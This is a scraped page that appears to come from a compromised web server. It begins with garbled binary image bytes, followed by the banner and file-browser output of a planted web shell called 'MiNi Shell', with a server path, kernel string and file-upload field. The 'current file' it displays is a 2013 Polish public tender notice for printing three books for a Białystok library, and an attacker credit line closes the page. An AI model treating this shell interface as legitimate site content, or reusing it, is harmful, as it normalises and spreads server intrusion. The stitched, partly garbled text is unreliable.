JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131113/460848-N-2013.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: projekt, skład i druk trzech wydawnictw książkowych dla Książnicy Podlaskiej im. Łukasza Górnickiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 460848 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Książnica Podlaska im. Łukasza Górnickiego , ul. Kilińskiego 16, 15-089 Białystok, woj. podlaskie, tel. 85 6767224, faks 85 6767220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksiaznicapodlaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: projekt, skład i druk trzech wydawnictw książkowych dla Książnicy Podlaskiej im. Łukasza Górnickiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:

1)	Erazm	Nakład	300 egz.
	Format	A5
	Objętość	100 stron
	kolor okładki	4+0
	kolor środka	1+1
	Oprawa	miękka, klejona
	Okładka	folia błyszcząca
	Papier	offsetowy, biały 80 g.
	ISBN/ISSN	posiada nr Książnicy Podlaskiej
	a)	dodatkowe wymagania	skład i łamanie;
projekt okładki, jej wykonanie (wraz z próbą kolorów okładki);
wydruk próbny w celu przeprowadzenia korekty (x2);
naniesienie korekt;
wykonanie 2 egzemplarzy sygnalnych ponad nakład tytułu publikacji w celu ostatecznej akceptacji;
dostarczenie wersji papierowej i elektronicznej (środka i okładki) pod wskazany adres
	dodatkowe informacje	poezja, proza
	
2)	Fotoalbum	Nakład	300 egz.
	Format	A5
	Objętość	77 
	kolor okładki	4+0
	kolor środka	4+4
	Oprawa	150 egz. - miękka, klejona + 150 egz. twarda, szyta nićmi
	Okładka	kartonowa, foliowana, błyszcząca
	Papier	kredowym, białym, matowym 130 g.
	ISBN/ISSN	posiada nr Książnicy Podlaskiej
	b)	dodatkowe wymagania	usługi drukarskie
wykonanie 2 egzemplarzy sygnalnych ponad nakład tytułu publikacji w celu ostatecznej akceptacji;
dostarczenie wersji papierowej i elektronicznej (środka i okładki) pod wskazany adres
	dodatkowe informacje	fotoalbum
materiał do druku (środek i okładka) zostanie dostarczony drukarni
	
3)	Antologia Ekumeniczna	Nakład	300 egz.
	Format	A5
	Objętość	100 stron
	kolor okładki	4+0
	kolor środka	1+1
	Oprawa	miękka, klejona
	Okładka	folia błyszcząca
	Papier	LUX CREAM 90G VOL.1.8 P/500
	ISBN/ISSN	posiada nr Książnicy Podlaskiej
	c)	dodatkowe wymagania	skład i łamanie;
projekt okładki, jej wykonanie (wraz z próbą kolorów okładki);
wydruk próbny w celu przeprowadzenia korekty (x2);
naniesienie korekt;
wykonanie 2 egzemplarzy sygnalnych ponad nakład tytułu publikacji w celu ostatecznej akceptacji;
dostarczenie wersji papierowej i elektronicznej (środka i okładki) pod wskazany adres
	dodatkowe informacje	poezja, proza
	

1.	Wykonawca zobowiązany jest po podpisaniu umowy przedstawić Zamawiającemu do akceptacji projekty graficzne i skład komputerowy wykonywanego zamówienia w formie elektronicznej i papierowej.
2.	Przed zrealizowaniem każdego z elementów przedmiotu zamówienia, Wykonawca zobowiązany będzie przedstawić wydruki próbne i dostarczyć je do ostatecznej korekty i akceptacji do siedziby Zamawiającego.
3.	Przedstawicielem Zamawiającego w zakresie uzgodnień technicznych, w tym akceptacji wydruku próbnego jest pan Daniel Znamierowski - Kierownik Działu Naukowego, Promocji i Wydawnictw Książnicy Podlaskiej im. Łukasza Górnickiego w Białymstoku.
4.	Wykonawca zobowiązany będzie do wykonania poszczególnych pozycji zamówienia w terminach uzgodnionych przez strony. Czas przygotowania poszczególnych wydawnictw przygotowania (skład, łamanie, projekt okładki, jej wykonanie (wraz z próbą kolorów okładki), wydruk próbny w celu przeprowadzenia korekty (x2), naniesienie korekt, 	wykonanie 2 egzemplarzy sygnalnych ponad nakład tytułu publikacji w celu ostatecznej akceptacji, druk i dostarczenie wersji papierowej i elektronicznej (środka i okładki) pod wskazany adres poszczególnych wydawnictw - od 2 do 3 tygodni od daty przekazania materiałów drukarni (w tym maksymalny czas na korektę ze strony Zamawiającego wynosi 1 tydzień). Przy podpisywaniu umowy Zamawiający zastrzega sobie prawo określenia najdłuższych terminów wykonania poszczególnych elementów zamówienia. 
5.	Wykonawca po wykonaniu poszczególnych elementów zamówienia przekazywać je będzie Zamawiającemu w formie określonej w SIWZ, tj. dostarcza na własny koszt do siedziby Zamawiającego i przekazuje Zamawiającemu majątkowe prawa autorskie do zaakceptowanych projektów.
6.	Zamawiający dostarczy Wykonawcy materiały tekstowe w formie elektronicznej oraz inne materiały wymagające obróbki niezbędne w danym wydawnictwie. Do części wydawnictw Zamawiający przekaże gotowe projekty lub przygotowane wcześniej makiety - pozycja 2 ze szczegółowego opisu przedmiotu zamówienia. 
7.	Zamawiający każdorazowo na piśmie lub w formie elektronicznej poda szczegóły dotyczące nakładu, formatu, objętości, rodzaju papieru, oprawy, terminu wykonania i inne konieczne dane do wykonania poszczególnych części przedmiotu zamówienia.
8.	Wykonawca zobowiązuje się dostarczyć na własny koszt nakład każdego z wydawnictw do siedziby Zamawiającego: Książnica Podlaska im. Łukasza Górnickiego, ul. Kilińskiego 16, pok. 33, p. II, 15-089 Białystok i zapewnić takie opakowanie książek, aby nie dopuścić do ich uszkodzenia w trakcie transportu. Na każdym opakowaniu Wykonawca zobowiązany jest umieścić tytuł książki i liczbę sztuk w paczce. Podstawę do odbioru wydawnictwa będzie stanowił protokół zdawczo-odbiorczy, podpisany przez obie strony bez zastrzeżeń.
9.	Zamawiający zastrzega sobie prawo kontroli losowo wybranych egzemplarzy przekazanych wydawnictwu.
10.	Dostawy będą realizowane w dniach roboczych (poniedziałek-piątek) w godzinach między 8:00 a 14:00, po wcześniejszym, telefonicznym zawiadomieniu osoby odpowiedzialnej za nadzór nad realizacją Umowy.
11.	Zamawiający zastrzega sobie prawo udzielenia zamówienia na zmniejszoną, niż wskazana w SIWZ, ilości poszczególnych składników zamówienia lub nie udzielenia zamówienia na niektóre składniki zamówienia. W takiej sytuacji Wykonawcy nie przysługuje prawo żądania wynagrodzenia za nie udzielone składniki lub ilości zamówienia albo żądania zwiększenia kwoty wynagrodzenia za poszczególne składniki zamówienia. Zmniejszenie ilości zamówienia może nastąpić nie więcej niż o 5 % każdej z części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 78.22.00.00-5, 78.22.50.00-0, 78.20.00.00-9, 78.21.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 190,00 zł (słownie: sto dziewięćdziesiąt zł).

    Wadium może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących
    formach:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 
BANK PEKAO S.A. 64 1240 5211 1111 0000 4919 5514 z adnotacją: wadium nr sprawy DO.331-2/2013. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi, że środki zostały zaksięgowane na rachunku Zamawiającego przed upływem terminu składania ofert lub potwierdzenie dokonania przelewu zostanie dołączone do oferty w oddzielnej kopercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie żądanych w pkt 6 niniejszej SIWZ oświadczeń i dokumentów, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu wykazania spełnienia warunku wiedzy i doświadczenia Wykonawca przedstawi wykaz wykonanych co najmniej 2 zamówień - zrealizowanych przez Wykonawcę w okresie 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, 
w tym okresie, usług poligraficznych, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 30.000,00 zł każde oraz daty i miejsca wykonania wraz 
z załączeniem dokumentów potwierdzających, że zamówienia  te zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu spełnienia tego warunku Wykonawca wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; (należy wykazać co najmniej 1 osobę posiadającą co najmniej 2 letnie doświadczenie w zakresie druku wydawnictw książkowych lub przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia co najmniej jednej osoby o takim doświadczeniu). Do wykazu należy dołączyć oświadczenie oferenta potwierdzające spełnienie powyższego wymogu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu spełnienia tego warunku Wykonawca przedstawi ksero aktualnej polisy a w przypadku jej braku oświadczenie, że najpóźniej w w dniu podpisania umowy Wykonawca dostarczy aktualną polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż  40.000,00 zł. W przypadku, gdy ofertę składa kilku Wykonawców działających jako konsorcjum powyższy warunek będzie uznany za spełniony, jeżeli będzie spełniał przynajmniej jeden z Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>próbki publikacji (dwie publikacje: twarda (fotoalbum) + miękka oprawa),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - jakość - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający, zgodnie z art. 144 Ustawy Pzp , przewiduje możliwość istotnej zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty w zakresie terminów jej wykonania lub w zakresie usług, w następujących okolicznościach:
- siły wyższej i innych zdarzeń losowych, w szczególności takich jak: pożar, powódź, promieniowanie lub skażenie, zamieszki, strajki, ataki terrorystyczne, nagłe załamania pogody, nagłe przerwy w dostawie energii elektrycznej,
- zmiany przepisów w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron, w tym ustawowej zmiany stawki podatku VAT-w takim przypadku wynagrodzenie Wykonawcy określone w umowie zostanie odpowiednio zwaloryzowane z uwzględnieniem nowej stawki podatku VAT,
- zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
- Zamawiający zastrzega sobie prawo zlecenia wykonania mniejszej ilości poszczególnych części przedmiotu umowy bez prawa żądania przez Wykonawcę wynagrodzenia umownego i kary umownej za niezrealizowaną część umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksiaznicapodlaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Książnica Podlaska im. Łukasza Górnickiego
ul. Kilińskiego 16 
15-089 Białystok
sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 11:00, miejsce: Książnica Podlaska im. Łukasza Górnickiego
ul. Kilińskiego 16 
15-089 Białystok
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com